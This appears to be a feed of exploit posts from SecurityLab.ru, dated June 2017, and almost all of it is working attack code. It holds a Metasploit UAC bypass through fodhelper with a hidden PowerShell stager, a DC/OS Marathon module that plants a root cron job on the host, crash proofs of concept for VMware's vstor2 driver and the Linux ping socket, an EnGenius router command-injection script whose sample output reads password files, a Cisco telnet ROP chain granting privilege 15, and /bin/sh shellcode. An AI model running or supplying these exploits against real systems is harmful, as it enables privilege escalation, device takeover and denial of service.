        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path(psh_path)
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

    if psh_payload.length > CMD_MAX_LEN
      fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
    end

    psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

    if existing.empty?
      registry_createkey(FODHELPER_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    unless exist_delegate
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling fodhelper.exe through cmd.exe allows us to launch it from either x86 or x64 session arch.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("/c #{FODHELPER_PATH}")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")
    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    Rex::sleep(5)
    handler(client)

    print_status("Cleaning up registry keys ...")
    unless exist_delegate
      registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
    end
    if existing.empty?
      registry_deletekey(FODHELPER_DEL_KEY, registry_view)
    else
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

DC/OS Marathon UI - Docker Exploit (Metasploit)

SecurityLab.ru - Fri, 2017-06-09 01:01
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with
        the '/' path mounted with read/write permissions on the host server that is running the
        docker container. As the docker container executes commands as uid 0 it is honored by the
        host operating system allowing the attacker to edit/create files owned by root. This exploit
        abuses this to create a cron job in the '/etc/cron.d/' path of the host server.

        *Notes: The docker image must be a valid docker image from hub.docker.com. Furthermore the
        docker container will only deploy if there are resources available in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
      ],
      'Targets'        => [
        [ 'Python', {
          'Platform' => 'python',
          'Arch'     => ARCH_PYTHON,
          'Payload'  => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' } }
        } ]
      ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end

  def get_apps
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => target_uri.path
    })
    return unless res and res.code == 200
    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)
    apps
  end

  def del_container(container_id)
    res = send_request_raw({
      'method' => 'DELETE',
      'uri'    => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200
    res.code
  end

  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
    rand_text_alpha_lower(8)
  end

  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
    cron_command = "python #{payload_path}"
    payload_data = payload.raw
    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"
    command
  end

  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'       => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'      => 1,
      'mem'       => 128,
      'disk'      => 0,
      'instances' => 1,
      'id'        => container_id,
      'container' => {
        'docker'  => {
          'image'   => datastore['DOCKERIMAGE'],
          'network' => 'HOST',
        },
        'type'    => 'DOCKER',
        'volumes' => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'    => {},
      'labels' => {}
    }
    container_data
  end

  def check
    return Exploit::CheckCode::Safe if get_apps.nil?
    Exploit::CheckCode::Appears
  end

  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end

    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()

    res = send_request_raw({
      'method' => 'POST',
      'uri'    => target_uri.path,
      'data'   => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)

    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status
      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"
        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end

    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end

VMware Workstation 12 Pro - Denial of Service

SecurityLab.ru - Fri, 2017-06-09 00:57
/*
 * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
 * CVE: 2017-4916 (VMSA-2017-0009)
 * Author: Borja Merino (@BorjaMerino)
 * Date: May 18, 2017
 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
 * Affected: VMware Workstation Pro/Player 12.x
 * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
 * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
 */

#include "windows.h"
#include "stdio.h"

void ioctl_crash() {
  HANDLE hfile;
  WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
  DWORD dummy;
  char reply[0x3FDC];
  hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
  char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
  DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
}

void run_vix() {
  STARTUPINFO si;
  PROCESS_INFORMATION pi;
  RtlZeroMemory(&si, sizeof(si));
  RtlZeroMemory(&pi, sizeof(pi));
  si.dwFlags |= STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_HIDE;
  DWORD createFlags = CREATE_SUSPENDED;
  CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}

int main() {
  run_vix(); // Comment this if vixDiskMountServer.exe is already running
  ioctl_crash();
  return 0;
}

Linux Kernel - 'ping' Local Denial of Service

SecurityLab.ru - Fri, 2017-06-09 00:56
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c

#include <stdio.h>
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static int sockfd = 0;
static struct sockaddr_in addr = {0};

// Second thread keeps flipping sin_family back to 0 while the main thread
// connects with a non-AF_INET family on the same ICMP ping socket.
void *fuzz(void *param) {
  while (1) {
    addr.sin_family = 0; // rand()%42;
    printf("sin_family1 = %08lx\n", (unsigned long)addr.sin_family);
    connect(sockfd, (struct sockaddr *)&addr, 16);
  }
  return NULL;
}

int main(int argc, char **argv) {
  sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
  pthread_t thrd;
  pthread_create(&thrd, NULL, fuzz, NULL);
  while (1) {
    addr.sin_family = 0x1a; // rand()%42;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    connect(sockfd, (struct sockaddr *)&addr, 16);
    addr.sin_family = 0;
  }
  return 0;
}

EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution

SecurityLab.ru - Tue, 2017-06-06 02:29
#!/usr/bin/env python
# coding: utf8
#
#
# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
#
#
# Vendor: EnGenius Technologies Inc.
# Product web page: https://www.engeniustech.com
# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
#                   ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
#                   ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
#                   EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
#                   ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
#                   ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
#                   ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
#
# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
# your iPhone, iPad or Android-based tablet or smartphone to transfer
# video, music and other files to and from a router-attached USB hard
# drive. Enshare is a USB media storage sharing application that enables
# access to files remotely. The EnShare feature allows you to access media
# content stored on a USB hard drive connected to the router's USB port in
# the home and when you are away from home when you have access to the Internet.
# By default the EnShare feature is enabled.
#
# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
# from your router-attached USB storage device to a remote/mobile device may
# vary based on Internet uplink and downlink speeds. The router's design enables
# users to connect numerous wired and wireless devices to it and supports intensive
# applications like streaming HD video and sharing of media in the home and accessing
# media away from the home with EnShare - Your Personal Media Cloud.
#
# Desc: EnGenius EnShare suffers from an unauthenticated command injection
# vulnerability. An attacker can inject and execute arbitrary code as the
# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
# script.
#
# =======================================================================
#
# bash-4.4$ python enshare.py 10.0.0.17
# [+] Command: ls -alsh
#     44 -rwxr-xr-x    1 0        0          42.5K Oct 31  2014 getsize.cgi
#      4 -rwxr-xr-x    1 0        0            606 Oct 31  2014 languageinfo.cgi
#     48 -rwxr-xr-x    1 0        0          44.2K Oct 31  2014 upload.cgi
#     48 -rwxr-xr-x    1 0        0          44.5K Oct 31  2014 usbinfo.cgi
#     56 -rwxr-xr-x    1 0        0          54.1K Oct 31  2014 usbinteract.cgi
#      0 drwxr-xr-x    4 0        0              0 Jun  3 00:52 ..
#      0 drwxr-xr-x    2 0        0              0 Oct 31  2014 .
#
# [+] Command: id
# uid=0(root) gid=0(root)
#
# [+] Command: cat /etc/passwd
#
# Connecting to 10.0.0.17 port 9000
#
# HTTP/1.1 200 OK
# root: !:0:0:root:/root:/bin/sh
# administrator: *:65534:65534:administrator:/var:/bin/false
# admin: *:60000:60000:webaccount:/home:/usr/bin/sh
# guest: *:60001:60000:webaccount:/home:/usr/bin/sh
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 13:48:14 GMT
# Server: lighttpd/1.4.31
#
# 0
# [+] Command: pwd
# /www/web/cgi-bin
# [+] Command: cat /etc/account.conf
#
# HTTP/1.1 200 OK
# 1: admin:admin:4
# 1: guest:guest:1
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 14:53:42 GMT
# Server: lighttpd/1.4.31
# bash-4.4$
#
# =======================================================================
#
# Tested on: Linux 2.6.36 (mips)
#            Embedded HTTP Server, Firmware Version 5.11
#            lighttpd/1.4.31
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5413
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
#
#
# 17.05.2017
#

import sys, socket

if len(sys.argv) < 2:
    print 'Usage: enshare.py <ip> [port]\n'
    quit()

ip = sys.argv[1]
port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
cmd = raw_input('[+] Command: ')

# The quote closes the CGI's own quoting of 'path'; '|' then hands cmd to the shell.
payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
payload += 'Host: {0}:{1}\r\n'
payload += 'Content-Length: {2}\r\n'
payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
payload += 'action=7&path=\"|{3}||\"'

# 19 = len('action=7&path="|') + len('||"')
msg = payload.format(ip, port, len(cmd) + 19, cmd)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = (ip, port)
print >>sys.stderr, '\nConnecting to %s port %s\n' % target
s.connect(target)
s.sendall(msg)
response = s.recv(5000)
s.close()
print response.strip()

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

SecurityLab.ru - Tue, 2017-06-06 01:39
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)

import socket
import sys
from time import sleep

set_credless = True

if len(sys.argv) < 3:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
elif sys.argv[2] == '--unset':
    set_credless = False
elif sys.argv[2] == '--set':
    pass
else:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Received bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'

# Telnet IAC SB, option 0x24 (ENVIRON), with the "CISCO_KITS" cluster sub-option
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4'  # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
# next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74'  # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
    payload += '\x00\x00\x99\x80'  # +12 set address of func that rets 1
else:
    payload += '\x00\x04\xea\x58'  # unset
payload += 'BBBB'  # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8'  # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC'  # +8
payload += 'DDDD'  # +12
payload += 'EEEE'  # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c'  # +20(+4) third gadget address 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60'  # +8 r1+8 = 0x022c8b60
payload += 'FFFF'  # +12
payload += 'GGGG'  # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28'  # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
    payload += '\x00\x12\x52\x1c'  # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
    payload += '\x00\x04\xe6\xf0'  # unset
payload += 'HHHH'  # +12
payload += 'IIII'  # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60'  # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ'  # +8 r1 points here at third gadget
payload += 'KKKK'  # +12
payload += 'LLLL'  # +16
payload += '\x01\x13\x31\xa8'  # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'  # IAC SE closes the sub-negotiation

s.send(payload)
print '[+] All done'
s.close()

Linux/x86-64 - /bin/sh Shellcode (31 bytes)

SecurityLab.ru - Tue, 2017-06-06 01:36
/*
;Title: Linux/x86-64 - /bin/sh Shellcode
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: This shellcode is based on the "JMP CALL POP" method to execute "/bin//sh". Length of shellcode is 31 bytes.
;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04)

===COMPILATION AND EXECUTION===
#nasm -f elf64 shell.asm -o shell.o
#ld shell.o -o shell                 <=== Making Binary File
#./bin2shell.sh shell                <== xtract hex code from the binary (https://github.com/touhidshaikh/bin2shell)

=================SHELLCODE(INTEL FORMAT)=================
section .text
global _start

_start:
    jmp shell

here:
    xor rax,rax
    pop rdi          ; rdi = address of "/bin//sh" pushed by the call below
    xor rsi,rsi      ; argv = NULL
    xor rdx,rdx      ; envp = NULL
    add rax,59       ; execve
    syscall

shell:
    call here
    bash db "/bin//sh"
===================END HERE============================

Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

int main() {
  printf("Touhid Shaikh (http://www.touhidshaikh.com)\n");
  printf("Shellcode Length : %d\n", (int)strlen(code));
  // The C string's terminating NUL ends "/bin//sh" for execve; the raw
  // 31 bytes carry no terminator of their own.
  int (*ret)() = (int(*)())code;
  ret();
  return 0;
}